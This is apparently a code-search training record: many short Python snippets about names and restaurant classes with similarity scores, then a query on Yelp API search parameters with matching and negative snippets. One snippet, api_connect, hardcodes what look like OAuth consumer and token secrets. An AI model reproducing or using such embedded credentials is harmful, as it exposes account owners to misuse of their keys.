"def _complete_name(self, cr, uid, ids, name, args, context=None):\n res = {}\n#####added \n context=context or {}\n \n for m in self.browse(cr, uid, ids, context=context):\n if context.get('no_complete_name'):\n res[m.id] = m.name\n return res\n names = [m.name]\n parent = m.location_id\n while parent:\n names.append(parent.name)\n parent = parent.location_id\n res[m.id] = ' / '.join(reversed(names))\n return res",
"def __init__(self, restaurant_name, cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type\n self.numbers_served = 0",
"def names(self) -> PlaceNames | None:\n pass",
"def getNames(self) -> List[unicode]:\n ...",
"def describe_restaurant(self):\n\t\tprint(f\"The resaurant name is {self.restaurant_name}.\")\n\t\tprint(f\"The resaurant type is {self.restaurant_type}.\")",
"def describeRestaurant(self):\n print (f\"{self.name} has the best {self.cuisineType}\")",
"def test_name_returner(self):\n test = self.data.name_returner()\n self.assertIn(('Trevor', 'Harvey'), test)\n self.assertIn(('Nik', 'Silver'), test)",
"def describe_restaurant(self):\n\t\tprint(\"name of the restaurant is \" + self.restaurant_name)\n\t\tprint(\"cuisine type is \" + self.cuisine_type)",
"def __init__(self,restaurant_name,cuisine_type='ice-cream'):\r\n super().__init__(restaurant_name,cuisine_type)\r\n self.flavors = []",
"def __init__(self, restaurant_name, cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type\n self.number_served = 0",
"def __init__(self, restaurant_name, cuisine_type):\n self.restaurant_name = restaurant_name\n self.cuisine_type = cuisine_type\n self.number_served = 0",
"def nameList(self):\r\n return [self.name.lower(), self.code] + self._otherNames",
"def _get_names(self):\n if len(self.firstnames):\n return self.firstnames, self.lastnames\n\n if os.path.exists(\"/code/api/app/utils/names.txt\"):\n with open(\"/code/api/app/utils/names.txt\") as file_with_names:\n names = file_with_names.readlines()\n else:\n # why yes, these are names of African Hollywood actors (according to Wikipedia)\n names = [\"Mehcad Brooks\", \"Malcolm Barrett\", \"Nick Cannon\", \"Lamorne Morris\", \"Neil Brown Jr.\",\n \"William Jackson Harper\", \"Marques Houston\", \"Jennifer Hudson\", \"Alicia Keys\", \"Meghan Markle\",\n \"Beyonce Knowles\", \"Jesse Williams\", \"Lance Gross\", \"Hosea Chanchez\", \"Daveed Diggs\",\n \"Damon Wayans Jr.\", \"Columbus Short\", \"Terrence Jenkins\", \"Ron Funches\", \"Jussie Smollett\",\n \"Donald Glover\", \"Brian Tyree Henry\", \"Gabourey Sidibe\", \"Trai Byers\", \"Robert Ri'chard\",\n \"Arjay Smith\", \"Tessa Thompson\", \"J.Lee\", \"Lauren London\", \"DeVaughn Nixon\", \"Rob Brown\", ]\n for _name in names:\n split_name = _name.strip().split(\" \")\n self.firstnames.append(split_name[0])\n lastname = \" \".join(split_name[1:]) if len(split_name) > 1 else \"\"\n self.lastnames.append(lastname)\n return self.firstnames, self.lastnames",
"def __init__(self, nome, tipo):\n self.restaurant_name = nome\n self.cuisine_type = tipo",
"def describe_restaurant(self):\r\n\t\tprint(\"Our restaurant is \" + self.restaurant_name.title() + \".\")\r\n\t\tprint(\"We are known for our \" + self.cuisine_type.title())",
"def describe_restaurant(self):\n\t\tprint(f\"{self.restaurant_name.title()} serves {self.cuisine_type}.\")",
"def donor_names():\n names = list()\n for name in donor_db:\n names = names + [name[0]]\n return names",
"def describe_restaurant(self):\n msg = f\"{self.name} serves wonderful {self.cuisine_type}.\"\n print(f\"\\n{msg}\")",
"def generate(self):\n return Name(forename=choice(self.first_names, p=self.first_name_freq),\n surname=choice(self.last_names, p=self.last_name_freq))",
"def test_names():\n first = get_name(\"As\")\n assert first == \"Arsenic\"\n\n second = get_name(\"Be\")\n assert second == \"Beryllium\"\n\n third = get_name(\"Li\")\n assert third == \"Lithium\"",
"def names(self):\n if isinstance(self.name, string_types):\n return [self.name]\n else:\n return list(self.name)",
"def describe_restaurant(self):\n print(f\"\\nRestaurant name: {self.restaurant_name}\")\n print(f\"Cuisine type: {self.cuisine_type}\")",
"def TransformNames(self) -> _n_2_t_0[str]:",
"def named_entities(self) -> List[str]:",
"def getRestaurantAddressDict(restaurants):\n addressdict = {}\n for rest in restaurants:\n if 'address' in rest:\n addressstring = str(rest['address']) + ' ' + str(rest['city'])\n addressdict[addressstring] = rest['name']\n\n return addressdict",
"def names(self):\n\t\treturn",
"def __get_names(self): \n names_str = self.names_text.get(1.0, END)\n names = names_str.splitlines()\n return names",
"def get_names_short(self):\r\n return [p.get_name() for p in self.people]",
"def describe_restaurant(self):\n\t\tdetails = f\"{self.restaurant_name} is a {self.cuisine_type} restaurant.\"\n\t\tprint(f\"\\n{details}\")",
"def generate_list_of_names(self):\n names = [donor._full_name for donor in self.donor_list]\n name_selection = \"\\n\".join(\n [\"{}\"] * len(self.donor_list)).format(*names)\n return name_selection",
"def resolveNames(self):\n client.resolveNames(self)\n # TODO: Do any name resolutions here.\n # The names of other objects this object refers to, either intrinsically or in its parameters, should be checked here.",
"def personas(self, pretty=True, sort=True):\n names = list(self.name2base)\n if pretty: names = [self.process_name(name, True) for name in names]\n if sort: names = sorted(names)\n return names",
"def getRestaurantAddresses(restaurants):\n addresslist = []\n for rest in restaurants:\n if 'address' in rest:\n addressstring = str(rest['address']) + ' ' + str(rest['city'])\n addresslist.append(addressstring)\n\n # pprint.pprint(addresslist)\n return addresslist",
"def resolveResult(self, restaurants):\n restaurant_list = []\n for restaurant in restaurants:\n restaurant_list.append({'Name': restaurant['restaurant']['name'], \"cuisines\": [x.strip() for x in restaurant['restaurant']['cuisines'].split(',')],\n \"lat\": restaurant['restaurant']['location']['latitude'], \"long\": restaurant['restaurant']['location']['longitude'], \"highlights\": restaurant['restaurant']['highlights'], \"Thumb\": restaurant['restaurant']['thumb'],\n \"user_Rating\": restaurant['restaurant']['user_rating']['aggregate_rating'],\"phone_Numbers\": restaurant['restaurant']['phone_numbers']})\n cuisineDict = { \"Chinese\":1, \"Korean\":2,\"Australia\":3,\"Japanese\":4,}\n WordDict = {1: \"cozy\",2: \"tasty\",3:'amazing',4:'flavorful',5:'yummy'}\n for i in range(len(restaurant_list)):\n icon = 5\n cuisines = restaurant_list[i][\"cuisines\"]\n adjective = WordDict[random.randint(1,5)]\n comment = \"This is a \"+ adjective\n if cuisines:\n if \"Chinese\" in cuisines:\n icon = 1\n elif \"Korean\" in cuisines:\n icon = 2\n elif \"Australia\" in cuisines:\n icon = 3\n elif \"Japanese\" in cuisines:\n icon = 4\n else:\n icon = 5\n comment = comment + \" \" + cuisines[0]\n restaurant_list[i]['icon'] = icon\n comment = comment + \" restaurant\"\n restaurant_list[i]['comment'] = comment\n res = {\"restaurants\":restaurant_list }\n return res",
"def test_return_all_names(self):\n test = self.data.return_all(first_name='Nik', last_name='Silver')\n self.assertEqual(test[0].first_name, 'Nik')\n\n test_2 = self.data.return_all(first_name='Trevor', last_name='Harvey')\n self.assertEqual(test_2[0].last_name, 'Harvey')",
"def Restaurant_get_info() -> Restaurant:\r\n name = input(\"Please enter the restaurant's name: \")\r\n cuisine = input(\"Please enter the kind of food served: \")\r\n phone = input(\"Please enter the phone number: \")\r\n menu = menu_enter()\r\n return Restaurant(name, cuisine, phone, menu)",
"def getNames(self, resname, atomname):\n rname = None\n aname = None\n if resname in self.map:\n res = self.map[resname]\n if res.hasAtom(atomname):\n atom = res.atoms[atomname]\n aname = atom.name\n rname = atom.resname\n return rname, aname",
"def get_alternate_names(self, alt_list):\n self.alternates = [a.name for a in alt_list if a.raga == self.name]",
"def names(\n self\n ) -> Tuple[str, ...]:\n return self._names",
"def find_names(s):\n \"*** YOUR CODE HERE ***\"",
"def describe_restaurant(self):\n print(f\"{self.restaurant_name} is a new restaurant opening on Main Street!\")\n print(f\"The restaurant specializes in {self.cuisine_type}-style food.\")",
"def director_name(self, director_name):",
"def __init__(self, name):\n self.name = name.replace(\" \", \"-\").lower()",
"def test_data_object_get_names_all(self):\n pass",
"def getShoppingListByName(cls, name, user):\n\n shop_list = db.session.query(Ingredient.aisle,Ingredient.name,ShoppingList.date_created).\\\n join(ShoppingList).\\\n filter(ShoppingList.ingredient_fk == Ingredient.name).\\\n filter(ShoppingList.name == name).\\\n filter(ShoppingList.user_fk == user).all()\n\n return shop_list",
"def get_names():\n only_links = SoupStrainer(\"a\")\n names = set()\n doc = requests.get(NAMES_URL).content\n links = BeautifulSoup(doc, \"html.parser\", parse_only=only_links)\n pokemon = links.find_all(title=re.compile(\"(\\w+)(\\s){1}(\\(Pokémon\\))\"))\n for cell in pokemon:\n names.add(str(cell.string))\n \n\n return names",
"def describe_restaurant(self):\n print(f\"{self.restaurant_name} is a new restaurant opening on Main Street!\")\n print(f\"The restaurant specializes in {self.cuisine_type}.\")",
"def process_names( names ):\n\tp_list = []\n\tfor i in xrange( len( names ) ):\n\t\t#print i\n\t\tp_list.append( str(i) + \"__\" + names[i] )\n\n\tRV = \";\".join(p_list)\n\treturn( RV )",
"def test_create_restaurant_with_name_creator_only(self):\n headers = {'Content-Type': 'application/json'}\n headers.update(auth_header_cru_restaurants)\n name = 'Restaurant Chinois'\n info = {'name': name, 'creator': '[email protected]'}\n resp = self.test_client.post(self.API_BASE + '/create', headers=headers, data=json.dumps(info))\n\n self.assertEqual(resp.status_code, 200)\n resp_dict = json.loads(resp.data)\n self.assertTrue(name in resp_dict['message'])",
"def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.names = ['Alice', 'Bob', 'Thomas', 'Belinda', 'Charlie']",
"def listBuilderNames():",
"def listBuilderNames():",
"def add_names(self, *sNames):\n self.names += list(sNames)",
"def _find_names(place):\n tags = place['tags']\n tags_names = ['name', 'place_name', 'alt_name']\n names = []\n for tag in tags_names:\n try:\n names.extend(tags[tag].split(';'))\n except KeyError:\n pass\n if not names:\n print \"Place has no name (#{})\".format(place['id'])\n return names",
"def __init__(self, **kwargs):\n super().__init__(list)\n\n for name, value in kwargs.items():\n normalized_name = \"-\".join(name.split(\"_\")).lower()\n self.add(normalized_name, value)",
"def test_legal_names(self):\n names = [prod.name for prod in generate_products()]\n sep = [(name.split()[0], name.split()[1]) for name in names]\n for name in sep:\n self.assertIn(name[0], ADJS)\n self.assertIn(name[1], NOUNS)",
"def name_generator(suggested, forbidden_names):\n new_name = suggested.strip()\n while new_name.lower() in [x.lower() for x in forbidden_names]:\n new_name += str(random.choice(string.ascii_lowercase))\n return new_name.strip()",
"def test_full_name(self):\n self.assertEqual(self.john.full_name, \"John Doe\")\n self.assertEqual(self.solar.full_name, \"Nathan Graule\")",
"def names(self):\n if type(self.name) is types.StringType:\n return [self.name]\n else:\n return list(self.name)",
"def __init__(self, name_s, items_in_store):\r\n self.name_s = name_s\r\n self.items_in_store = items_in_store",
"def split_name(fullname):",
"def __init__(self, name_a: str, name_b: str) -> None:\n self.names = tuple(sorted((name_a, name_b)))",
"def load_existing_names(self, region_name, types=None):\n if types:\n existing_places = self._request_typed_existing(region_name, types)\n else:\n existing_places = self._request_existing(region_name)\n place_names = []\n for place in existing_places:\n place_names.extend(self._find_names(place))\n return [self._sanitise_name(place) for place in place_names]",
"def __init__(self, _name, _drink=menu.water, _food=menu.bread):\n self.name = _name\n self.drinks = []\n self.food = []\n self.drinks.append(_drink)\n self.food.append(_food)",
"def get_name():",
"def example_usernames():\n return [\"A\", \"B\", \"C\"]",
"def separate_names (name, alt_name=None):\n\n names = name.split(' ')\n\n # Pop first item in list\n first_name = names.pop(0)\n # middle_name = None\n last_name = None\n\n if len (names):\n # Pop last item of list\n # last_name = names.pop()\n\n # We got rid of middle name so now the rest of the names are last name\n last_name = ' '.join(names)\n\n elif alt_name:\n last_name = alt_name\n\n # if len (names):\n # # Middle name(s) are the rest of the list\n # middle_name = ' '.join(names)\n\n return {\n \"first_name\": first_name,\n # \"middle_name\": middle_name if middle_name else '',\n \"last_name\": last_name if last_name else ''\n }",
"def return_names(self):\n return self.__name_list",
"def build_menu(names,values,calories):\n menu=[]\n for i in range(len(names)):\n menu.append(Food(values[i],calories[i],names[i]))\n\n return menu",
"def drug_names_on_drug_list(drug_list):\n return [dl[\"Drug (brand name)\"] for dl in drug_list]",
"def set_Names(self, value):\n super(GetTokenDetailsInputSet, self)._set_input('Names', value)"
] | [
"0.64432555",
"0.63475114",
"0.63256043",
"0.62955445",
"0.6226382",
"0.6113798",
"0.6113798",
"0.6113798",
"0.6090916",
"0.6087849",
"0.6081929",
"0.60531896",
"0.6052965",
"0.6027582",
"0.60216314",
"0.6010803",
"0.58969116",
"0.58843607",
"0.587389",
"0.5793254",
"0.5793254",
"0.5779338",
"0.57611746",
"0.57611746",
"0.57280326",
"0.5649751",
"0.5649396",
"0.5645619",
"0.5645497",
"0.56404555",
"0.563474",
"0.56264454",
"0.5624207",
"0.5616123",
"0.56058276",
"0.55924475",
"0.5590253",
"0.5586419",
"0.5578187",
"0.5578187",
"0.55679375",
"0.5558778",
"0.5548517",
"0.55411434",
"0.5536072",
"0.5501316",
"0.5492034",
"0.5488161",
"0.5479375",
"0.543837",
"0.54245496",
"0.54151386",
"0.541205",
"0.5386864",
"0.5379247",
"0.536815",
"0.53610533",
"0.53504634",
"0.5346764",
"0.5340859",
"0.53260887",
"0.5325389",
"0.5317212",
"0.5313492",
"0.5303807",
"0.53001267",
"0.52888227",
"0.5287953",
"0.5287699",
"0.5287117",
"0.5268209",
"0.52571744",
"0.5256668",
"0.5254549",
"0.52544624",
"0.52522653",
"0.5251631",
"0.52487695",
"0.5230652",
"0.5228956",
"0.5228956",
"0.5203118",
"0.5195022",
"0.5186803",
"0.5175549",
"0.51755166",
"0.5170086",
"0.51666445",
"0.5159072",
"0.5158205",
"0.51572704",
"0.5152853",
"0.51480067",
"0.5139222",
"0.51375353",
"0.51328784",
"0.5130726",
"0.5128176",
"0.5120119",
"0.51170015"
] | 0.53139603 | 63 |
set the parameters for yelp API | def get_search_parameters(self, name):
params = {}
params["term"] = str(name)
params["sort"] = "0"
params["radius.filter"] = "2000"
params["limit"] = "1" #return the first search item
params["location"] = "Mesa, AZ"
return params | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def set_params(self, **kwargs):\n ...",
"def api_connect(self, params):\n\t\tconsumer_key = \"XwD3f3Yoe2GcjqXSd5kRkA\"\n\t\tconsumer_secret = \"VtZMCNmBNEardBkIXo-RU7De-wU\"\n\t\ttoken = \"JymbFW3SgkWemf6aTEHUvsNoPg9Nh7hZ\"\n\t\ttoken_secret = \"S4XUSKiIcUCYnlC3q7FYgUC47co\"\n\t\t\n\t\tsession = rauth.OAuth1Session(consumer_key = consumer_key,\n\t\tconsumer_secret = consumer_secret,\n\t\taccess_token = token,\n\t\taccess_token_secret = token_secret,\n\t\t)\n\t\t\n\t\trequest = session.get(\"http://api.yelp.com/v2/search\",params=params)\n\t\t\n\t\tdata = request.json()\n\t\tsession.close()\n\t\t\n\t\treturn data",
"def set_params(self):\r\n pass",
"def set_params(self, **kwargs) -> NoReturn:\n pass",
"def set_params(self, params):",
"def params_helper(self,**kwargs):\n\n dic = {'output' : 'json, xml, kml',\n 'maxresults' : 'limit on max number of results returned ; Default is limited to 100',\n 'countrycode' : 'GB, US etc ISO Country Code ==> Only 2 caracters !',\n 'latitude' : 'latitude reference for distance calculation',\n 'distance' : 'return results based on specified distance from specified latitude/longitude',\n 'distanceunit' : 'Miles or km',\n 'operatorid' : 'exact match on a given EVSE operator id (comma separated list)',\n 'connectiontypeid' : ' exact match on a given connection type id (comma separated list)',\n 'countryid' : 'exact match on a given country id (comma separated list)',\n 'levelid' : 'exact match on a given charging level (1-3) id (comma separated list)',\n 'minpowerkw' : 'minimum output power in kW (this information is not known for many locations)',\n 'usagetypeid' : 'exact match on a given usage type id (comma separated list) ',\n 'statustypeid' : ' exact match on a given status type id (comma separated list)',\n 'dataproviderid ' : 'exact match on a given data provider id id (comma separated list). Use opendata=true for only OCM provided (\"Open\") data.',\n 'modifiedsince' : 'POIs modified since the given date (UTC) e.g. 2016-09-15T09:30',\n 'opendata' : ' true or false. Set to true to include only Open Data licensed content, false to return only non-open licensed data. By default all available data is returned.',\n 'includecomments' : ' true or false. Set to true to also include user comments and media items (photos) per charging location. Default = false.',\n 'verbose ' : ' true or false. Set to false to get a smaller result set with null items removed. Default = true.',\n 'compact ' : 'true or false. Set to true to remove reference data objects from output (just returns IDs for common reference data such as DataProvider etc). Default = false.',\n 'camelcase' : 'true or false. Set to true to get a property names in camelCase format. Default = false',\n 'callback' : 'specify the name of the JSONP callback (if required), JSON response type only.'\n }\n\n if len(kwargs)==0 :\n\n for key in dic.keys() :\n print(key)\n\n else :\n \n for k in kwargs: \n print(dic.get(k))",
"def set_params(self):\n raise NotImplementedError",
"def search_yelp(params):\n url = 'https://api.yelp.com/v3/businesses/search'\n headers = {'Authorization': 'Bearer ' + os.environ['YELP_KEY']}\n resp = requests.get(url=url, params=params, headers=headers)\n responses = resp.json()\n return responses",
"def ask(self):\n self.term = str(input(\"What are you looking for? (Coffee, Restaurants, Museums, Bars) \"))\n if self.term.lower() == 'quit':\n sys.exit()\n self.destination = str(input(\"Where are you looking to go? (Neighborhood, City or City, State) \"))\n if self.destination.lower() == 'quit':\n sys.exit()\n \n \n #Request/JSON\n self.request = self.session.get(\"http://api.yelp.com/v2/search\", params={'term': self.term,'location': self.destination})\n self.request = self.request.json()\n \n #Dataframing\n self.menu = json_normalize(self.request['businesses'])\n self.menu.index = list(range(1, 21))\n self.menu = self.menu[['name', 'categories', 'location.address', 'location.city', 'location.coordinate.latitude', \\\n 'location.coordinate.longitude', 'review_count', 'rating', 'snippet_text']]\\\n .sort_values(['rating'], ascending=False).sort_index()",
"def set_params(self, params_):\n x_start, x_end = params_[\"lim_fit\"]\n self.find_idx_of_fit_limit(x_start, x_end)\n self.is_error_bar_for_fit = params_[\"use_error_bar\"]\n self.fitting_method1 = params_[\"method1\"]\n self.fitting_method2 = params_[\"method2\"]\n self.qty_to_min = params_[\"qty_to_min\"]\n\n for i, key in enumerate(self.params):\n # self.params[key].set(value=params_[\"val\"][i], min=params_[\"min\"][i], max=params_[\"max\"][i], vary=bool(params_[\"hold\"][i]), brute_step=params_[\"brute_step\"][i])\n if self.params[key].user_data is not None:\n if \"dontGenerate\" in self.params[key].user_data:\n continue\n self.params[key].set(value=params_[key][\"value\"], min=params_[key][\"min\"], max=params_[key][\"max\"], vary=params_[key][\"vary\"], brute_step=params_[key][\"b_step\"])",
"def update_params(self):\n pass",
"def set_params(self, **kwargs):\n warnings.warn(\"'set_params()' not defined for locator of type \" +\n str(type(self)))",
"def set_params(self, *argv, **kwargs):\n pass",
"def set_params(self, *argv, **kwargs):\n pass",
"def set_params(self, *argv, **kwargs):\n pass",
"def set_params(self, *argv, **kwargs):\n pass",
"def set_params(self, *argv, **kwargs):\n pass",
"def good_params():\n from scraper import PARAMS\n params = PARAMS.copy()\n params['Business_Name'] = 'CodeFellows'\n params['City'] = 'Seattle'\n return params",
"def set_parameters(self, params):\n self.kp = params.pgain",
"def __init__(self, find=None, near=None, max_results=3, **kwargs) -> None:\n super(YelpSpider, self).__init__(**kwargs)\n self.find = find\n self.near = near\n self.max_results = int(max_results)",
"def set_related_params(self,request,responsedata):\n pass",
"def setParams(self, paramSet):\r\n pass",
"def set_parameters(api_name='',\r\n targeted_flag='true',\r\n tv_flag='false',\r\n hinge_flag='true',\r\n cos_flag='false',\r\n interpolation='bilinear',\r\n model_type='large',\r\n loss_type='triplet',\r\n dataset_type='vgg',\r\n target_model='large',\r\n target_loss='center',\r\n target_dataset='VGG',\r\n attack='CW',\r\n norm='2',\r\n epsilon=0.1,\r\n iterations=20,\r\n binary_steps=5,\r\n learning_rate=0.01,\r\n epsilon_steps=0.01,\r\n init_const=0.3,\r\n mean_loss='embeddingmean',\r\n batch_size=-1,\r\n margin=15.0,\r\n amplification=6.0,\r\n granularity='normal',\r\n whitebox_target=False,\r\n pair_flag='false'):\r\n \r\n params = {}\r\n params['model_type'] = model_type\r\n params['loss_type'] = loss_type\r\n params['dataset_type'] = dataset_type\r\n params['target_model'] = target_model\r\n params['target_loss'] = target_loss\r\n params['target_dataset'] = target_dataset\r\n params['attack'] = attack\r\n params['norm'] = norm\r\n params['epsilon'] = epsilon\r\n params['iterations'] = iterations\r\n params['binary_steps'] = binary_steps\r\n params['learning_rate'] = learning_rate\r\n params['epsilon_steps'] = epsilon_steps\r\n params['init_const'] = init_const\r\n params['mean_loss'] = mean_loss\r\n params['batch_size'] = batch_size\r\n params['test_dir'] = TEST_DIR\r\n params['full_dir'] = FULL_DIR\r\n params['whitebox_target'] = whitebox_target\r\n params['targeted_flag'] = string_to_bool(targeted_flag)\r\n params['tv_flag'] = string_to_bool(tv_flag)\r\n params['hinge_flag'] = string_to_bool(hinge_flag)\r\n params['cos_flag'] = string_to_bool(cos_flag)\r\n params['pair_flag'] = string_to_bool(pair_flag)\r\n params['api_name'] = api_name\r\n\r\n if model_type == 'small' and loss_type == 'center':\r\n params['pixel_max'] = 1.0\r\n params['pixel_min'] = -1.0\r\n else:\r\n params['pixel_max'] = 1.0\r\n params['pixel_min'] = 0.0\r\n\r\n if dataset_type == 'vggsmall' and not whitebox_target:\r\n params['align_dir'] = VGG_ALIGN_160_DIR\r\n params['test_dir'] = VGG_TEST_DIR\r\n elif model_type == 'large' or dataset_type == 'casia':\r\n params['align_dir'] = ALIGN_160_DIR\r\n elif model_type == 'small':\r\n params['align_dir'] = ALIGN_96_DIR\r\n else:\r\n ValueError('ValueError: Argument must be either \"small\" or \"large\".')\r\n \r\n if interpolation == 'nearest':\r\n params['interpolation'] = cv2.INTER_NEAREST\r\n elif interpolation == 'bilinear':\r\n params['interpolation'] = cv2.INTER_LINEAR\r\n elif interpolation == 'bicubic':\r\n params['interpolation'] = cv2.INTER_CUBIC\r\n elif interpolation == 'lanczos':\r\n params['interpolation'] = cv2.INTER_LANCZOS4\r\n elif interpolation == 'super':\r\n ValueError('ValueError: Super interpolation not yet implemented.')\r\n else:\r\n raise ValueError('ValueError: Argument must be of the following, [nearest, bilinear, bicubic, lanczos, super].')\r\n\r\n if granularity == 'fine':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 20.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.2)\r\n elif granularity == 'normal':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 10.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.5)\r\n elif granularity == 'coarse':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 5.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 1.0)\r\n elif granularity == 'coarser':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.2)\r\n elif granularity == 'coarsest':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 1.0)\r\n elif granularity == 'single':\r\n params['margin_list'] = np.array([margin])\r\n params['amp_list'] = np.array([amplification])\r\n elif granularity == 'fine-tuned':\r\n params['margin_list'] = np.arange(10.0, margin, 1.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.2)\r\n elif granularity == 'coarse-single':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.array([1.0])\r\n elif granularity == 'api-eval':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.8)\r\n else:\r\n raise ValueError('ValueError: Argument must be of the following, [fine, normal, coarse, coarser, single].')\r\n\r\n if params['hinge_flag']:\r\n params['attack_loss'] = 'hinge'\r\n else:\r\n params['attack_loss'] = 'target'\r\n if not params['targeted_flag']:\r\n params['attack_loss'] = 'target'\r\n if norm == 'inf':\r\n norm_name = 'i'\r\n else:\r\n norm_name = '2'\r\n if params['tv_flag']:\r\n tv_name = '_tv'\r\n else:\r\n tv_name = ''\r\n if params['cos_flag']:\r\n cos_name = '_cos'\r\n else:\r\n cos_name = ''\r\n\r\n params['model_name'] = '{}_{}'.format(model_type, loss_type)\r\n if dataset_type == 'casia' or dataset_type == 'vggsmall':\r\n params['model_name'] = dataset_type\r\n params['target_model_name'] = '{}_{}_{}'.format(target_model, target_loss, target_dataset)\r\n params['attack_name'] = '{}_l{}{}{}'.format(attack.lower(), norm_name, tv_name, cos_name)\r\n params['directory_path'] = os.path.join(ROOT,\r\n OUT_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/full'.format(params['attack_loss']))\r\n params['directory_path_crop'] = os.path.join(ROOT,\r\n OUT_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/crop'.format(params['attack_loss']))\r\n params['directory_path_npz'] = os.path.join(ROOT,\r\n OUT_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/npz'.format(params['attack_loss']))\r\n params['api_path'] = os.path.join(ROOT,\r\n API_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/npz'.format(params['attack_loss']))\r\n if params['mean_loss'] == 'embedding':\r\n params['directory_path'] += '_mean'\r\n params['directory_path_crop'] += '_mean'\r\n params['directory_path_npz'] += '_mean'\r\n params['api_path'] += '_mean'\r\n\r\n return params",
"def yelp(n=1):\n tweet = get_tweet(YELP_NAME, n) # Yelp checkin info aggregated to twitter.\n yelp_info = {\n 'biz-name': parse_yelp_name(tweet.text),\n 'biz-uri': parse_yelp_uri(tweet.text),\n 'location': 'San Francisco, CA',\n 'date': tweet.created_at.strftime('%A, %B %d'),\n 'time': tweet.created_at.strftime('%H:%M'),\n 'tip': \"\",\n }\n return jsonify(yelp_info)",
"def init_params():\r\n\r\n p = OrderedDict()\r\n p['startYear'] = 1855\r\n p['num5YearAgeClasses'] = 25\r\n p['numCareLevels'] = 5\r\n p['pixelsInPopPyramid'] = 2000\r\n p['pixelsPerTown'] = 16 # 56\r\n p['mapGridXDimension'] = 20\r\n p['mapGridYDimension'] = 25\r\n p['careLevelColour'] = ['deepskyblue','green','yellow','orange','red']\r\n p['careDemandInHours'] = [ 0.0, 12.0, 24.0, 48.0, 96.0 ]\r\n p['unmetNeedColor'] = ['deepskyblue','green','yellow','orange','red', 'mediumorchid']\r\n p['houseSizeColour'] = ['deepskyblue','green','yellow','orange','red', 'mediumorchid']\r\n p['mainFont'] = 'Helvetica 18'\r\n p['fontColour'] = 'white'\r\n p['dateX'] = 70\r\n p['dateY'] = 20\r\n p['popX'] = 70\r\n p['popY'] = 50\r\n p['delayTime'] = 0.0\r\n p['maxTextUpdateList'] = 12\r\n \r\n return p",
"def _update_params(self):\n pass",
"def set_params(self,**kwargs):\n for key in kwargs:\n setattr(self, key, kwargs[key])",
"def set_params(self, *arg):\n pass",
"def _generate_params(self):\n return {\n 'lis_outcome_service_url': self.lis_outcome_service_url,\n 'lis_result_sourcedid': self.lis_result_sourcedid,\n 'oauth_consumer_key': self.key\n }",
"def set_params(self, state_dicts):\n raise NotImplementedError",
"def set_parameters(self, **kwargs):\n self.__select_k_best.set_params(**kwargs)",
"def __init__(self, apikey, providerkey = None):\n self.apikey = apikey\n \n # Set User-Agent\n self.headers = {'User-Agent': \"Prowlpy/%s\" % str(__version__),\n 'Content-type': \"application/x-www-form-urlencoded\"}\n\n # Aliasing\n self.add = self.post",
"def define_parameters(self):",
"def set_params(self, **kwargs):\n\n kw_keys = list(kwargs)\n\n if 'alpha' in kw_keys:\n self.alpha = kwargs['alpha']\n\n if 'beta' in kw_keys:\n self.beta = kwargs['beta']\n\n if 'gamma' in kw_keys: \n \tself.gamma = kwargs['gamma']\n\n if 'epsilon' in kw_keys:\n self.epsilon = kwargs['epsilon']\n \n self.nact = self.highbound-self.lowbound\n self.actions = np.arange(self.nact)",
"def set_hyperparams(self, params):",
"def set_params(self, params: Dict):\n\n if params['training_instances'] is not None:\n self.training_instances = params['training_instances']\n if params['n'] is not None:\n self.n = params['n']\n if params['lda'] is not None:\n self.lda = params['lda']\n if params['verbose'] is not None:\n self.verbose = params['verbose']\n\n self.num_features = self.training_instances[0].get_feature_count()\n self.w = None\n self.b = None",
"def _set_params(self,x):\r\n self.k._set_params(x)",
"def updateParameters(self):\n\n return",
"def __init__( self, parameters={} ):\n self.params = {}",
"def _update_params(self):\n raise NotImplementedException()",
"def init_params(self):\n blah",
"def set_search_params(self, **kwargs):\n self._search_params = kwargs",
"def set_params(self, **params):\n return super().set_params(**params)",
"def _set_parameter(self):\n # Get parameter keys\n self.input_parameter = self.parameter_combobox.currentText()\n self.result_parameter = self.result_parameters[self.input_parameter]\n # Adjust axes labels\n self.ax.set_xlabel('{} steunpunt'.format(self.input_parameter))\n self.ax.set_ylabel('{} uitvoerlocatie'.format(self.input_parameter))\n # Set data\n self._set_data()",
"def updateParameters(self, parameters):",
"def set_query_string(self):\n\n if self.search_by == 'by-postal-code':\n self.querystring = {'postalCode': self.search_input, 'countryCode': \"US\"}\n else :\n self.querystring = {'city': self.search_input}",
"def setup_params(self, response):\n self.login_url = self.login_handler.login_url\n ((self.region_id, self.region),) = response[\"region\"].items()\n self._host = \"{}.{}\".format(self.region_id, BLINK_URL)\n self._token = response[\"authtoken\"][\"authtoken\"]\n self._auth_header = {\"Host\": self._host, \"TOKEN_AUTH\": self._token}\n self.urls = BlinkURLHandler(self.region_id, legacy=self.legacy)\n self.networks = self.get_networks()\n self.client_id = response[\"client\"][\"id\"]\n self.account_id = response[\"account\"][\"id\"]",
"def set_params(self, **params):\n\n return super().set_params(**params)",
"def _set_params(self,x):\r\n self.k1._set_params(x[:self.k1.num_params])\r\n self.k2._set_params(x[self.k1.num_params:])",
"def _set_params(self,x):\r\n self.k1._set_params(x[:self.k1.num_params])\r\n self.k2._set_params(x[self.k1.num_params:])",
